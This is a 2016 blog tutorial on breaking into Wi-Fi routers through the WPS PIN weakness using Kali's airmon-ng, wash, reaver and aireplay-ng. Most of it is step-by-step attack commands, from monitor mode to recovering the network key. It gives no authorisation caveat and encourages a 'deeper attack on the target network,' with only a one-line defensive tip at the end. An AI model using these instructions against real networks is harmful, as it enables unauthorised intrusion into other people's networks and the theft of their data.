Hacking Wifi with Kali and Reaver

Attacking WPS vulnerability of some routers

Posted by Adones Pitogo on Mar 3, 2016

WPS is a known vulnerability of some routers. A short clip from reaver-wps wiki describing WPS attack:

Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values. The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum. Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts.

Let’s start!

Enable wireless card monitor mode

First, we need a packet injection capable wireless card. To determine if you’re card is capable of packet injection, you can check out the tutorial at Aircrack-ng’s website since it is out of scope for this tutorial.

Assuming you have a capable card, let’s switch it from managed to monitor mode. Kill all processes that can interrupt monitor mode:

# airmon-ng check kill

Enable monitor mode:

# airmon-ng start wlan0

If you don’t know which interface your wireless card is, issue the command iwconfig or ifconfig or ip addr show. Wireless interfaces are marked IEEE 802.11bgn. Your wireless card would probably be named wlan0 or something similar.

Airmon will create a new interface called wlan0mon, wich is your wlan0 but in monitor mode.

Find a vulnerable AP (access point/router)

We will use wash command to find a WPS vulnerable access point.

# wash -i wlan0mon

If you encoutner [!] Found packet with bad FCS, skipping... error, try:

# wash -i wlan0mon --ignore-fcs

Wash will then show APs with WPS enabled. Now if you see a WPS Locked with No value, that means the AP is WPS vulnerable.

Select your target AP and take note of its BSSID and Channel.

Launch the attack

Now that we have the valuable data of our target AP, we can proceed on launching the attack: reaver -i wlan0mon -b <BSSID> -c <channel> -a -vv

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv

where -a tells reaver to automatically adjust base on the target’s behaviour, and -vv is for verbosity. Check reaver --help for more options.

Some wireless cards, like the Alfa AWUS036NH I used, encounter an association error. You can fix this by opening another terminal and do the association with:

# aireplay-ng -1 0 -a <BSSID> <interface>

Then modify your reaver command by adding -A argument, meaning that the association is done in a separate process:

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A

Another thing to look out for is when you get M5 right away and get a timeout error when sending the M6 message. It might be that the target AP indeed has WPS enbled but is not configured. Don’t waste your time on this AP, I’ve tried it and reaver will never get the PIN. See the discussion here.

If you’re receiving NACK messages, it means AP is responding to WPS requests as expected.

Patience is a virtue

It will take around 10 hours or even days depending on the signal strength for reaver to crack the PIN. The good thing is you can pause reaver (Ctrl+C) and resume the attack in another time. You can leave Reaver running during the night if you wish.

Once Reaver has cracked the PIN, it will show the PSK of the AP. You can now connect to it and perform a deeper attack on the target network.

Youtube Demo

To prevent this kind of attack, disable WPS on your routers or don’t use routers with WPS at all.

Share: Email Twitter Facebook Google LinkedIn Reddit StumbleUpon Tumblr Buffer Digg